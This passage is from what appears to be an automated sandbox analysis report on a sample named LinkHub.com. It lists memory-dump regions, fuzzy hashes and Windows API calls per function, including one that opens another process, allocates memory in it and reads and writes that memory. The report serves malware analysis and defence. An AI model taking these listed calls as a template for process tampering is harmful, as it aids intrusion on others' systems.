                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 19b38a4f0c96b7f5124c478d1d285d2580e434d064e69e1409d5ba8c5ad8a093
                                                                    • Instruction ID: 0cee06cdb06bb36b835c494fc429c7c1095a88d6795e5b521f00418eec3d08ba
                                                                    • Opcode Fuzzy Hash: 19b38a4f0c96b7f5124c478d1d285d2580e434d064e69e1409d5ba8c5ad8a093
                                                                    • Instruction Fuzzy Hash: EAF01D32565205EBC765EFA8EA92D1B77EDFE04710BA58C06F04DD7502CB30FCA08A64
                                                                    APIs
                                                                    • _free.LIBCMT ref: 0027262E
                                                                      • Part of subcall function 00272D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0027DB51,?,00000000,?,00000000,?,0027DB78,?,00000007,?,?,0027DF75,?), ref: 00272D4E
                                                                      • Part of subcall function 00272D38: GetLastError.KERNEL32(?,?,0027DB51,?,00000000,?,00000000,?,0027DB78,?,00000007,?,?,0027DF75,?,?), ref: 00272D60
                                                                    • _free.LIBCMT ref: 00272640
                                                                    • _free.LIBCMT ref: 00272653
                                                                    • _free.LIBCMT ref: 00272664
                                                                    • _free.LIBCMT ref: 00272675
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: b0c046dddeeef8d22ec0bac4f2c112b01bdca60b31da4ed401f21cfd53bbbe59
                                                                    • Instruction ID: 96fca1d6aa9b359ad3e03c63e4a91efa944e343d047b629f96cd83ca8c15edfe
                                                                    • Opcode Fuzzy Hash: b0c046dddeeef8d22ec0bac4f2c112b01bdca60b31da4ed401f21cfd53bbbe59
                                                                    • Instruction Fuzzy Hash: 57F0DA70823121DBC763AF94ED119C93BACBB2C751B45CA0BF41896276C7354936AF85
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$_free
                                                                    • String ID: a/p$am/pm
                                                                    • API String ID: 3432400110-3206640213
                                                                    • Opcode ID: f6944b06139b829d759c4f3b4eec8aecc0c6182400888d9a0e25816e52d7ffd5
                                                                    • Instruction ID: a04a32f251cf0270ba7f91e160baabafd049fd48b0728d1d9c3acf5e6ecbacf3
                                                                    • Opcode Fuzzy Hash: f6944b06139b829d759c4f3b4eec8aecc0c6182400888d9a0e25816e52d7ffd5
                                                                    • Instruction Fuzzy Hash: FAD11275930207DACB289F6CC8557BAB7B5FF05700F28C15AE90AAB290D3759DB0CB91
                                                                    APIs
                                                                      • Part of subcall function 002B41FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,002C52EE,?,?,00000035,?), ref: 002B4229
                                                                      • Part of subcall function 002B41FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,002C52EE,?,?,00000035,?), ref: 002B4239
                                                                    • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 002C5419
                                                                    • VariantInit.OLEAUT32(?), ref: 002C550E
                                                                    • VariantClear.OLEAUT32(?), ref: 002C55CD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastVariant$ClearFormatInitMessage
                                                                    • String ID: bn*
                                                                    • API String ID: 2854431205-2497137059
                                                                    • Opcode ID: 141c41600fe2093d9564740f6872a92806c5ada80b57f007f8e37fe99d75ab09
                                                                    • Instruction ID: 8bc469520df6f2565be30b74821c84b8bda37b3ed8485a1c2299d6e29933fbde
                                                                    • Opcode Fuzzy Hash: 141c41600fe2093d9564740f6872a92806c5ada80b57f007f8e37fe99d75ab09
                                                                    • Instruction Fuzzy Hash: 89D149709206499FCB18DF94C890EEEBBB8FF48304F54815DE416AB292DB71E996CF50
                                                                    APIs
                                                                    • __Init_thread_footer.LIBCMT ref: 0024D253
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Init_thread_footer
                                                                    • String ID: t51$t51$t51
                                                                    • API String ID: 1385522511-2957420709
                                                                    • Opcode ID: 833771d9cd39c82bf112490c6570c86b575e603c9a7365c3376754a7160f5b71
                                                                    • Instruction ID: 237bcfa1ba15cc239756d40ce4d9e8b3a2d0c3d2adb822719f113d22c79a9f60
                                                                    • Opcode Fuzzy Hash: 833771d9cd39c82bf112490c6570c86b575e603c9a7365c3376754a7160f5b71
                                                                    • Instruction Fuzzy Hash: 9B914B75A20206CFCB18CF58C4906AAB7F2FF59310F24815AD949AB341D771EEA2CF90
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper_wcslen
                                                                    • String ID: CALLARGARRAY$bn*
                                                                    • API String ID: 157775604-4234519341
                                                                    • Opcode ID: 75a9d4eaa43a69a643c9dc10f9c6017127c54a802d94e9a873069739d22b0847
                                                                    • Instruction ID: 66efb93951a9ccd5b588354d3e923873fe8b73031dac204773f99195352b380a
                                                                    • Opcode Fuzzy Hash: 75a9d4eaa43a69a643c9dc10f9c6017127c54a802d94e9a873069739d22b0847
                                                                    • Instruction Fuzzy Hash: D041D331E202059FCB04DFA4C889EAEBBB5FF59320F14416EE805A7251DB719DA1CF91
                                                                    APIs
                                                                      • Part of subcall function 002ABDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002A2B1D,?,?,00000034,00000800,?,00000034), ref: 002ABDF4
                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002A30AD
                                                                      • Part of subcall function 002ABD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002A2B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 002ABDBF
                                                                      • Part of subcall function 002ABCF1: GetWindowThreadProcessId.USER32(?,?), ref: 002ABD1C
                                                                      • Part of subcall function 002ABCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,002A2AE1,00000034,?,?,00001004,00000000,00000000), ref: 002ABD2C
                                                                      • Part of subcall function 002ABCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,002A2AE1,00000034,?,?,00001004,00000000,00000000), ref: 002ABD42
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002A311A
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002A3167
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                    • String ID: @
                                                                    • API String ID: 4150878124-2766056989
                                                                    • Opcode ID: 5977325c7ecab7acd8988b41ecd5a0331457cff335a480909a34c3549a04eb22
                                                                    • Instruction ID: a970ed4f261f91e3bc78fca1ca111152ac2308da908f8e9fd49df2468c3e74e4
                                                                    • Opcode Fuzzy Hash: 5977325c7ecab7acd8988b41ecd5a0331457cff335a480909a34c3549a04eb22
                                                                    • Instruction Fuzzy Hash: 9A411872900218AFDB11DFA4CD86ADEBBB8EF4A700F004095FA45B7181DA706E95CF60
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com,00000104), ref: 00271AD9
                                                                    • _free.LIBCMT ref: 00271BA4
                                                                    • _free.LIBCMT ref: 00271BAE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _free$FileModuleName
                                                                    • String ID: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
                                                                    • API String ID: 2506810119-1422740149
                                                                    • Opcode ID: 6bde50a0503926b0ce9a328cf5aaf301a0adf493917e5031f1b976ecb3f588b3
                                                                    • Instruction ID: 681053d690f1aa25b3779b9945c4612163ae14a6eaa6b4cefccec73840c03eae
                                                                    • Opcode Fuzzy Hash: 6bde50a0503926b0ce9a328cf5aaf301a0adf493917e5031f1b976ecb3f588b3
                                                                    • Instruction Fuzzy Hash: 2E316671A10219EFCB21DF9DDC85D9EBBFCEF85714F1081A6E40897211E6B08E61CB90
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 002ACBB1
                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 002ACBF7
                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003129C0,01865150), ref: 002ACC40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Delete$InfoItem
                                                                    • String ID: 0
                                                                    • API String ID: 135850232-4108050209
                                                                    • Opcode ID: eebbdada1b896ceead38382da978db7bd016cbaf7b14310e07d94193d54ccaad
                                                                    • Instruction ID: 865dae2be5db4cd05d56537758bfa767820ac594f197bb145dee3a19b872449d
                                                                    • Opcode Fuzzy Hash: eebbdada1b896ceead38382da978db7bd016cbaf7b14310e07d94193d54ccaad
                                                                    • Instruction Fuzzy Hash: E841D271214302DFD720DF28DC84B1ABBE9EF86724F244A1EF4A597291DB30E914CB62
                                                                    APIs
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,002DDCD0,00000000,?,?,?,?), ref: 002D4F48
                                                                    • GetWindowLongW.USER32 ref: 002D4F65
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002D4F75
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long
                                                                    • String ID: SysTreeView32
                                                                    • API String ID: 847901565-1698111956
                                                                    • Opcode ID: dd689a176e67f6ce559b2992313d3ccc1b3ab4ce71e5b49feacc0287d0c32720
                                                                    • Instruction ID: 4d4a06e7917b98a8e3b62a9eef3467a4d72602e62414ce19947b0dc3c621dbf4
                                                                    • Opcode Fuzzy Hash: dd689a176e67f6ce559b2992313d3ccc1b3ab4ce71e5b49feacc0287d0c32720
                                                                    • Instruction Fuzzy Hash: DB31C231624606AFDB219F38DC45BDA77A9EF08334F204716F979922E0C770EC609B50
                                                                    APIs
                                                                      • Part of subcall function 002C3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,002C3AD4,?,?), ref: 002C3DD5
                                                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 002C3AD7
                                                                    • _wcslen.LIBCMT ref: 002C3AF8
                                                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 002C3B63
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                    • String ID: 255.255.255.255
                                                                    • API String ID: 946324512-2422070025
                                                                    • Opcode ID: 82cbf157dc7a55d3bd2c93d984b33b4914ea49b4e76a0dbc02d2d5cf8d452906
                                                                    • Instruction ID: a208875d01668af6cc9f57cee6d3596b388f242b7b34f9942ccd44f50de363a0
                                                                    • Opcode Fuzzy Hash: 82cbf157dc7a55d3bd2c93d984b33b4914ea49b4e76a0dbc02d2d5cf8d452906
                                                                    • Instruction Fuzzy Hash: F631A1396102029FCB10CF68C585FAA77B0EF15328F24CA5DE8168B392D771EE55CB60
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002D49DC
                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002D49F0
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 002D4A14
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window
                                                                    • String ID: SysMonthCal32
                                                                    • API String ID: 2326795674-1439706946
                                                                    • Opcode ID: 3d8fa29378141f8e5272c89db79ffff3394924dd93ec44c69f724aae85d27d38
                                                                    • Instruction ID: 2e420fcc26beaf3250235155a305df5ebe65e6d3685b895493698de3e9def9e0
                                                                    • Opcode Fuzzy Hash: 3d8fa29378141f8e5272c89db79ffff3394924dd93ec44c69f724aae85d27d38
                                                                    • Instruction Fuzzy Hash: 2321BF32620219ABDF119F90DC86FEB3B69EF48718F110215FA156B1D0D6B1AC61DB90
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 002D51A3
                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 002D51B1
                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 002D51B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DestroyWindow
                                                                    • String ID: msctls_updown32
                                                                    • API String ID: 4014797782-2298589950
                                                                    • Opcode ID: 54c6f8cae90f1a49c4a69f783b7fcdf5bee1c9ab3170de0e78f1763b7d2991a8
                                                                    • Instruction ID: 9a7b5f54e47e72f27725a611ee51cdf8f37717e5366cd2fa940dbc5a04f7073b
                                                                    • Opcode Fuzzy Hash: 54c6f8cae90f1a49c4a69f783b7fcdf5bee1c9ab3170de0e78f1763b7d2991a8
                                                                    • Instruction Fuzzy Hash: 8F2190B561161AAFDB01DF28DC81DB737ADEF5A364B04015AF9049B3A1CB70EC21CBA0
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002D42DC
                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002D42EC
                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 002D4312
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$MoveWindow
                                                                    • String ID: Listbox
                                                                    • API String ID: 3315199576-2633736733
                                                                    • Opcode ID: 9e91745b03388a4bc3f688ab98dc6136e937d34bb07dd57db049d14b80bb2d7d
                                                                    • Instruction ID: 76f9c523418e1120c2e80a258aa40cf200c9d12cc3206b481fb388959df1a37e
                                                                    • Opcode Fuzzy Hash: 9e91745b03388a4bc3f688ab98dc6136e937d34bb07dd57db049d14b80bb2d7d
                                                                    • Instruction Fuzzy Hash: 5321C232621119BBEF119F94DC88FFB376EEF89754F118116F9009B290C6719C618BA0
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 002B544D
                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 002B54A1
                                                                    • SetErrorMode.KERNEL32(00000000,?,?,002DDCD0), ref: 002B5515
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$InformationVolume
                                                                    • String ID: %lu
                                                                    • API String ID: 2507767853-685833217
                                                                    • Opcode ID: ed872337638b620139a0d959b1984473aeae2de8594909305a0ff1edbfda73d5
                                                                    • Instruction ID: e03a2d3930a7f69d31cfadaa973782ea1b6b8074b2dcab05c7d69aa30f20f731
                                                                    • Opcode Fuzzy Hash: ed872337638b620139a0d959b1984473aeae2de8594909305a0ff1edbfda73d5
                                                                    • Instruction Fuzzy Hash: E3316F70A10219AFDB10DF64C885EAA77F8EF09304F1440A5F809DB262DB71EE55CF61
                                                                    APIs
                                                                    • GetActiveWindow.USER32 ref: 002D8339
                                                                    • EnumChildWindows.USER32(?,002D802F,00000000), ref: 002D83B0
                                                                      • Part of subcall function 0024249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002424B0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ActiveChildEnumLongWindows
                                                                    • String ID: (1$(1
                                                                    • API String ID: 3814560230-2411089095
                                                                    • Opcode ID: fcebffa005a0e073ac554b02801686f67953070dc1e59722f34bd3940388282d
                                                                    • Instruction ID: 03a26f81a7e9f759d69c67b784c407244ffb3b573aadaa375896602b0b69fc39
                                                                    • Opcode Fuzzy Hash: fcebffa005a0e073ac554b02801686f67953070dc1e59722f34bd3940388282d
                                                                    • Instruction Fuzzy Hash: 6B212A74211606DFC725CF28E840AA6B7E5FB49720F20465AF879973A0EB70AC71DF60
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 002D4CED
                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 002D4D02
                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 002D4D0F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
